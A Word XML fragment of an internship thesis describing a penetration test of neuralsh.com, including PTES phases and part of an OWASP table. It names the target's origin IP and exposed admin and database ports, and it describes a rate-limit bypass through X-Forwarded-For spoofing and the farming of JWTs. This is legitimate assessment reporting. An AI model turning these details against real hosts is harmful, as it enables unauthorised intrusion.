        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HTB offers two certification pathways that were directly relevant to this internship:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2.1 Certified Penetration Testing Specialist (CPTS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Figure 4: HTB CPTS certification logo — cpts_logo.png]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The Certified Penetration Testing Specialist (CPTS) pathway covers the full penetration testing engagement lifecycle — from information gathering and reconnaissance through network enumeration, web application attacks, privilege escalation, Active Directory exploitation, and professional reporting. The curriculum is structured around real-world methodology rather than abstract theory, covering every phase of the PTES framework applied in this internship.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Skills developed through CPTS — including DNS enumeration, port scanning interpretation, service fingerprinting, and authentication bypass — were applied directly during the neuralsh.com engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2.2 Certified Web Exploitation Specialist (CWES)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Figure 5: HTB CWES certification logo — cwes_logo.png]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The Certified Web Exploitation Specialist (CWES) is an HTB certification focused specifically on web application security and exploitation. It covers the full OWASP Top 10 attack categories in depth, including broken access control, authentication failures, injection vulnerabilities, insecure design, and API security testing — all of which appeared as findings in this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CWES is particularly relevant to the neuralsh.com assessment because the target is a web application with an API-driven architecture. Skills from the CWES pathway — including JWT analysis, rate-limiting bypass techniques, API endpoint enumeration via JavaScript bundle inspection, and authentication flow exploitation — directly informed the discovery and exploitation of findings N-005 (Rate Limit Bypass) and N-007 (JWT Token Farming), both of which were confirmed exploited during this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3. The Penetration Testing Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This internship followed the Penetration Testing Execution Standard (PTES) — a six-phase lifecycle that structures the engagement from initial information gathering through final reporting. Unlike an ad-hoc approach where tools are run without direction, PTES ensures that every phase produces evidence that feeds the next, and that nothing is tested without a defined reason. The six phases applied in this engagement are described below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Figure 6: Penetration Testing Process Diagram — pentest_flow.drawio.png]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.1 Phase 1 — Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reconnaissance was the first and most time-intensive phase of the engagement. The goal was to map the entire publicly accessible attack surface of neuralsh.com before any active probing began. This phase used only passive and semi-passive techniques — primarily querying public records and observing what the target broadcast about itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key activities included WHOIS registration lookups, DNS record enumeration (A, MX, TXT, NS, and CNAME records), and SSL certificate transparency log analysis. The most impactful discovery in this phase was the origin IP address (103.16.62.217), obtained by resolving the MX record for the mail server. JavaScript bundle analysis of the Nuxt.js frontend also revealed internal API route structures, including the unauthenticated token endpoint that was later exploited.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.2 Phase 2 — Scanning and Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>With the origin IP identified, active scanning was conducted against 103.16.62.217 to determine which services were reachable from the internet. Nmap was used to perform a full TCP port scan, revealing a large number of open ports that should not have been publicly accessible — including port 2087 (WHM admin panel), port 3306 (MySQL), port 2083 (cPanel), port 9001 (MikroTik), and port 25 (SMTP). Web application enumeration using Dirb and Nikto identified accessible admin interfaces, exposed directory listings, and additional administrative endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.3 Phase 3 — Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The vulnerability assessment phase involved manually evaluating each discovered service against known vulnerability classes. Rather than relying solely on automated scanner output, manual analysis was performed on authentication flows, API endpoints, HTTP response headers, CORS configuration, and session token handling. All findings were mapped to OWASP Top 10 categories and scored using CVSS v3.1. This phase produced the complete findings register — 20 vulnerabilities across four severity bands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.4 Phase 4 — Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exploitation was conducted in a controlled, non-destructive manner for findings where proof-of-concept demonstration was feasible without causing service disruption or data modification. Two exploitation chains were confirmed: rate limiting bypass via X-Forwarded-For header spoofing (50/50 requests bypassed) and JWT token farming via the unauthenticated token endpoint (50 valid tokens collected).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.5 Phase 5 — Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Post-exploitation analysis assessed the realistic impact of a successful initial compromise, conducted in read-only mode. This phase focused on tracing what attack paths would be available to an attacker who had reached each foothold — including shared hosting lateral movement risk and network infrastructure control via the exposed MikroTik panel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.6 Phase 6 — Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The reporting phase produced all deliverables: a full professional VAPT report, attack chain diagrams, and this thesis document. Every finding card was written with both a technical audience (the development and operations team) and a non-technical audience (management) in mind.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4. OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Figure 7: OWASP logo — owasp_logo.png]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The Open Web Application Security Project (OWASP) is a nonprofit foundation dedicated to improving software security. Its most widely referenced publication is the OWASP Top 10 — a consensus-based list of the ten most critical web application security risks.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74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Rank**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Category**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Description**</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Failures in enforcing restrictions on what authenticated users are allowed to do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Weaknesses in how data is protected in transit or at rest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Untrusted data sent to an interpreter as part of a command or query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Architectural flaws where security was not considered during the design phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Improperly configured permissions, unnecessary features enabled, default credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Vulnerable and Outdated Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Use of components with known vulnerabilities that have not been patched</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Identification and Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Weaknesses in authentication — missing rate limiting, weak session management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Software and Data Integrity Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
